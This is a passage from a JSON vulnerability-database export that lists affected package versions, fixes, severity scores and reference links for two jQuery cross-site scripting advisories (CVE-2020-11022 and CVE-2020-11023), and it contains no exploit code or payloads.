"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "maximebf/debugbar", "ecosystem": "Packagist", "purl": "pkg:composer/maximebf/debugbar" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.19.0" } ] } ], "versions": [ "1.0", "1.0.1", "1.0.2", "1.0.3", "1.0.4", "1.1", "1.10.0", "1.10.1", "1.13.1", "1.2", "1.3", "1.4", "1.5", "1.5.1", "1.6", "1.6.1", "1.7", "1.7.1", "1.8", "1.9", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.14", "1.9.15", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9", "v1.10.2", "v1.10.3", "v1.10.4", "v1.10.5", "v1.11.0", "v1.11.1", "v1.12.0", "v1.13.0", "v1.14.0", "v1.14.1", "v1.15.0", "v1.15.1", "v1.16.0", "v1.16.1", "v1.16.2", "v1.16.3", "v1.16.4", "v1.16.5", "v1.17.0", "v1.17.1", "v1.17.2", "v1.17.3", "v1.18.0", "v1.18.1", "v1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "athlon1600/youtube-downloader", "ecosystem": "Packagist", "purl": "pkg:composer/athlon1600/youtube-downloader" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.0.0" } ] } ], "versions": [ "v1.0.0", "v1.0.1", "v2.0.0", "v2.0.1", "v2.0.2", "v2.0.3", "v2.0.4", "v2.0.5", "v2.0.6", "v2.0.7", "v2.0.8", "v2.0.9", "v2.1.0", "v2.1.1", "v2.1.2", "v3.0.0", "v3.0.1", "v3.0.2", "v3.1.0", "v3.1.1", "v3.1.2", "v4.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } }, { "package": { "name": "components/jquery", "ecosystem": "Packagist", "purl": "pkg:composer/components/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.0" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.4", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.4", "3.0.0", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.1", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-gxr4-xjj5-5px2/GHSA-gxr4-xjj5-5px2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11022" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/issues/447" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77" }, { "type": "WEB", "url": "https://github.com/maximebf/php-debugbar/commit/847216e60544258c881f2733d699bbcfeefac0fc" }, { "type": "WEB", "url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202007-03" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4693" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2020-002" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1518" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-10" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2020-11" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-02" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-10" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-gxr4-xjj5-5px2" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/releases/tag/3.5.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11022.yml" }, { "type": "WEB", "url": "https://jquery.com/upgrade-guide/3.5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3Ccommits.airflow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-04-29T22:18:37Z", "nvd_published_at": "2020-04-29T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jpcq-cgw6-v4j6", "published": "2020-04-29T22:19:14Z", "modified": "2025-10-22T19:26:30.488832Z", "aliases": [ "BIT-drupal-2020-11023", "CVE-2020-11023" ], "related": [ "CVE-2020-11023" ], "summary": "Potential XSS vulnerability in jQuery", "details": "### Impact\nPassing HTML containing `\u003coption\u003e` elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. `.html()`, `.append()`, and others) may execute untrusted code.\n\n### Patches\nThis problem is patched in jQuery 3.5.0.\n\n### Workarounds\nTo workaround this issue without upgrading, use [DOMPurify](https://github.com/cure53/DOMPurify) with its `SAFE_FOR_JQUERY` option to sanitize the HTML string before passing it to a jQuery method.\n\n### References\nhttps://blog.jquery.com/2020/04/10/jquery-3-5-0-released/\n\n### For more information\nIf you have any questions or comments about this advisory, search for a relevant issue in [the jQuery repo](https://github.com/jquery/jquery/issues). If you don't find an answer, open a new issue.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.4.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1", "4.2.0", "4.2.1", "4.2.2", "4.3.0", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0.1", "3.1.0", "3.1.1", "3.2.1", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.12.2", "1.12.3", "1.12.4", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.0", "3.3.1", "3.4.0", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } }, { "package": { "name": "components/jquery", "ecosystem": "Packagist", "purl": "pkg:composer/components/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.3" }, { "fixed": "3.5.0" } ] } ], "versions": [ "1.10.0", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.12.4", "1.8.3", "1.9.0", "1.9.1", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.4", "3.0.0", "3.1.0", "3.1.1", "3.2.0", "3.2.1", "3.3.1", "3.4.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/jquery/jquery/security/advisories/GHSA-jpcq-cgw6-v4j6" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11023" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-10" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9@%3Ccommits.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9%40%3Ccommits.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2021-02" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.drupal.org/sa-core-2020-002" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4693" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-11023" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-565129" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-565440" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230725-0003" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200511-0006" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202007-03" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6@%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6%40%3Cdev.felix.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://jquery.com/upgrade-guide/3.5" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-23064.yml" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-11023.yml" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/releases/tag/3.5.0" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/blob/99afa6fdeaf5d1d23e1021ff915a5e5dbc82c1f1/advisories/github-reviewed/2020/04/GHSA-jpcq-cgw6-v4j6/GHSA-jpcq-cgw6-v4j6.json#L20-L37" }, { "type": "WEB", "url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72%40%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": 